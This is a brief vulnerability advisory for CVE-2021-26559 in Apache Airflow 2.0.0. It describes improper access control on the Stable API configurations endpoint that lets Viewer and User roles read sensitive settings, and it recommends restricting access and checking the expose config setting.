CVE-2021-26559

Name of the Vulnerable Software and Affected Versions Apache Airflow version 2.0.0

Description The issue is related to Improper Access Control on the Configurations Endpoint for the Stable API of Apache Airflow. This allows users with Viewer or User role to obtain Airflow Configurations, including sensitive information, even when the [webserver] expose config is set to False in airflow.cfg. This vulnerability enabled a privilege escalation attack.

Recommendations For Apache Airflow version 2.0.0, consider restricting access to the Configurations Endpoint to prevent unauthorized users from obtaining sensitive information until a patch is available. As a temporary workaround, review and adjust the [webserver] expose config setting in airflow.cfg to ensure it is properly configured to restrict access to sensitive configurations.